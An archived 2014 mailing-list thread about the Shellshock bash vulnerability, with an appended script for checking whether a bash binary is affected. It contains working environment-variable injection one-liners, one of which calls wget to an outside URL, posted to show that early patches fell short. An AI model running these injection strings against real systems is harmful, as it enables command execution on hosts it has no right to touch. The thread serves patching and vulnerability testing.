[kictanet] [Skunkworks] Bash Code Injection Vulnerability (CVE-2014-6271)

Gichuki John Chuksjonia chuksjonia at gmail.com
Fri Sep 26 13:16:56 EAT 2014


This vulnerability is worse than Heartbleed; even after patching Bash,
you can still inject into it.

rm -f echo && env -i  X='() { (a)=>\' bash -c 'echo date'; cat echo
rm -f echo && env -i  X='() { (a)=>\' bash -c 'echo ls -la'; cat echo
rm -f echo && env -i  X='() { (a)=>\' bash -c 'echo wget http://my.co.ke/';

Be prepared to patch, and still watch your systems, and patch later
on, when a full one is released.

On 9/26/14, Amarjit Labhuram via skunkworks <skunkworks at lists.my.co.ke> wrote:
> To the linux admins,
>
> here is some more info on Shellshock.
> http://www.bbc.com/news/technology-29361794/
>
> Have a great day!
>
> Warm regards,
> Amarjit Singh Labhuram.
>
> On Thu, Sep 25, 2014 at 5:08 PM, Laban Mwangi via skunkworks <
> skunkworks at lists.my.co.ke> wrote:
>
>> Anything that uses bash (Linux/FreeBSD/OSX/Cygwin)... Potentially, this
>> includes your home router (dlink, linksys)!
>>
>> On Thu, Sep 25, 2014 at 8:38 AM, Bwana Lawi via skunkworks <
>> skunkworks at lists.my.co.ke> wrote:
>>
>>> If you are using Red Hat products, please have this patched.
>>>
>>> Read more here.
>>>
>>> _______________________________________________
>>> skunkworks mailing list
>>> skunkworks at lists.my.co.ke
>>> ------------
>>> List info, subscribe/unsubscribe
>>> http://lists.my.co.ke/cgi-bin/mailman/listinfo/skunkworks
>>> ------------
>>>
>>> Skunkworks Rules
>>> http://my.co.ke/phpbb/viewtopic.php?f=24&t=94
>>> ------------
>>> Other services @ http://my.co.ke
>>>
>>
>>
>


-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/
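
Added example, not part of the original post: a non-destructive way for an admin to run the post's first test line against a given bash binary, inside a throwaway directory, and read the result from whether a file named `echo` appears. The names `probe_bash`, `verdict_for_dir` and `BASH_UNDER_TEST` are hypothetical, chosen for this sketch.

```shell
#!/bin/sh
# Added example: check a bash binary with the test line from the post,
# without touching the caller's working directory.

# verdict_for_dir DIR: on an affected bash the test's side effect is a file
# named "echo" in the working directory (the output of the command that
# followed "echo" was redirected into it). Its presence is the signal.
verdict_for_dir() {
    if [ -e "$1/echo" ]; then
        echo "vulnerable"
    else
        echo "not-vulnerable"
    fi
}

# probe_bash [BASH]: run the test against BASH (default: bash from PATH) in a
# fresh temp directory. Prints: vulnerable | not-vulnerable | error
probe_bash() {
    shell_path=$(command -v "${1:-bash}" 2>/dev/null) || { echo "error"; return 0; }
    scratch=$(mktemp -d) || { echo "error"; return 0; }
    (
        # Same command as in the post; stdout and parser errors are discarded.
        cd "$scratch" &&
            env -i X='() { (a)=>\' "$shell_path" -c 'echo date' >/dev/null 2>&1
    ) || true
    verdict_for_dir "$scratch"
    rm -rf "$scratch"
}

# Check the first bash in PATH (override with BASH_UNDER_TEST=/path/to/bash).
probe_bash "${BASH_UNDER_TEST:-bash}"
```

Run it once per bash binary installed on the host (for example a system copy and a locally built one), and again after each vendor update.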



